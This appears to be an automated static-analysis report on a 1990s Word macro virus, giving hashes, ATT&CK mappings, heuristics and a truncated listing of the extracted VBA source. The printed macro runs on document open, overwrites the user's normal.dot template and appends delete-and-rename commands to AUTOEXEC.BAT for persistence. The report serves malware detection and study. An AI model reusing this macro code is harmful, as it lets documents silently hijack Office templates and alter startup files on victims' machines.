Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3b0514b28cd449d1…

MALICIOUS

Office (OLE)

36.0 KB Created: 1980-01-11 05:39:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 6939ecf2e5b098f8dc074ae6bc4c104d SHA-1: 10f0371eecb0d43811c3cac69c92a9bde7d9d551 SHA-256: 3b0514b28cd449d1ae5ea53b4b4841eeacae70af9baf29999e2b353e55c6321f
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains a VBA macro with an AutoOpen subroutine, indicating it is designed to execute automatically when the document is opened. The macro attempts to replace the user's normal.dot template with a malicious file named 'kafeln.dot' located in the Office templates directory. It also attempts to delete the original normal.dot and rename the malicious file, effectively establishing persistence. The macro also attempts to execute commands via AUTOEXEC.BAT, suggesting further malicious activity.

Heuristics 3

  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4377 bytes
SHA-256: fb36076ccff7cd90a402e3938d078ddc947f9e41b07675d8368773bb3184c7e2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub AutoOpen()
    ActiveDocument.SaveAs FileName:= _
        "C:\Program Files\Microsoft Office\Шаблоны\kafeln.dot", FileFormat:= _
        wdFormatTemplate, LockComments:=False, Password:="", AddToRecentFiles:= _
        True, WritePassword:="", ReadOnlyRecommended:=False, EmbedTrueTypeFonts:= _
        False, SaveNativePictureFormat:=False, SaveFormsData:=False, _
        SaveAsAOCELetter:=False
    ChangeFileOpenDirectory "C:\"
    Documents.Open FileName:="AUTOEXEC.BAT", ConfirmConversions:=False, _
        ReadOnly:=False, AddToRecentFiles:=False, PasswordDocument:="", _
        PasswordTemplate:="", Revert:=False, WritePasswordDocument:="", _
        WritePasswordTemplate:="", Format:=wdOpenFormatAuto
    Selection.EndKey Unit:=wdStory
    Selection.TypeParagraph
    Selection.TypeText Text:="cd C:\Program Files\Microsoft Office\Шаблоны\"
    Selection.TypeParagraph
    Selection.TypeText Text:="del normal.dot"
    Selection.TypeParagraph
    Selection.TypeText Text:="ren kafeln.dot normal.dot"
    ActiveDocument.Save
    ActiveDocument.Close
    Application.Run MacroName:="ATPtour"
End Sub
Sub ATPtour()
    ChangeFileOpenDirectory "C:\"
    Documents.Open FileName:="AUTOEXEC.BAT", ConfirmConversions:=False, _
        ReadOnly:=False, AddToRecentFiles:=False, PasswordDocument:="", _
        PasswordTemplate:="", Revert:=False, WritePasswordDocument:="", _
        WritePasswordTemplate:="", Format:=wdOpenFormatAuto
    Selection.EndKey Unit:=wdStory
    Selection.TypeParagraph
    Selection.TypeText Text:="md c:\atp_tour"
    Selection.TypeParagraph
    Selection.TypeText Text:="md c:\atp_tour\kafelnik.001"
    Selection.TypeParagraph
    Selection.TypeText Text:="md c:\atp_tour\sampras.002"
    Selection.TypeParagraph
    Selection.TypeText Text:="md c:\atp_tour\corretja.003"
    Selection.TypeParagraph
    Selection.TypeText Text:="md c:\atp_tour\rafter.004"
    Selection.TypeParagraph
    Selection.TypeText Text:="md c:\atp_tour\moya.006"
    Selection.TypeParagraph
    Selection.TypeText Text:="md c:\atp_tour\henman.007"
    Selection.TypeParagraph
    Selection.TypeText Text:="md c:\atp_tour\rios.008"
    Selection.TypeParagraph
    Selection.TypeText Text:="md c:\atp_tour\philipou.009"
    Selection.TypeParagraph
    Selection.TypeText Text:="md c:\atp_tour\kucera.010"
    Selection.TypeParagraph
    Selection.TypeText Text:="md c:\atp_tour\krajicek.005"
    Selection.TypeParagraph
    Selection.TypeText Text:="subst k: c:\atp_tour >nul"
    Selection.TypeParagraph
    ActiveDocument.Save
    ActiveDocument.Close
    Application.Run MacroName:="ATP"
End Sub
Sub ATP()
Dim Msg, Style, Title, Help, Ctxt, Response, MyString
Msg = "3 мая 1999 года Кафельников - номер 1!!!!!!!!"
Style = vbYesOk + vbCritical + vbDefaultButton2
Title = "ATPtour"
Help = "DEMO.HLP"
Ctxt = 1000
Response = MsgBox(Msg, Style, Title, Help, Ctxt)
If Response = vbYes Then
    MyString = "Да"
Else
    MyString = "Нет"
End If
    Application.Run MacroName:="tour"
End Sub
Sub tour()
Dim Msg, Style, Title, Help, Ctxt, Response, MyString
Msg = "3 мая 1999 года Кафельников - номер 1!!!!!!!!"
Style = vbYesOk + vbCritical + vbDefaultButton2
Title = "ATPtour"
Help = "DEMO.HLP"
Ctxt = 1000
Response = MsgBox(Msg, Style, Title, Help, Ctxt)
If Response = vbYes Then
    MyString = "Да"
Else
    MyString = "Нет"
End If
    Application.Run MacroName:="Info"
End Sub
Sub Info()
Attribute Info.VB_Description = "Макрос записан 07.04.98 Tvangeste"
Attribute Info.VB_ProcData.VB_Invoke_Func = "Project.NewMacros.Info"
Dim Msg, Style, Title, Help, Ctxt, Response, MyString
Msg = "Kafelnikov"
Style = vbYesOk + vbCritical + vbDefaultButton2
Title = "Tvangeste v 2.0"
Help = "DEMO.HLP"
Ctxt = 1000
R
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.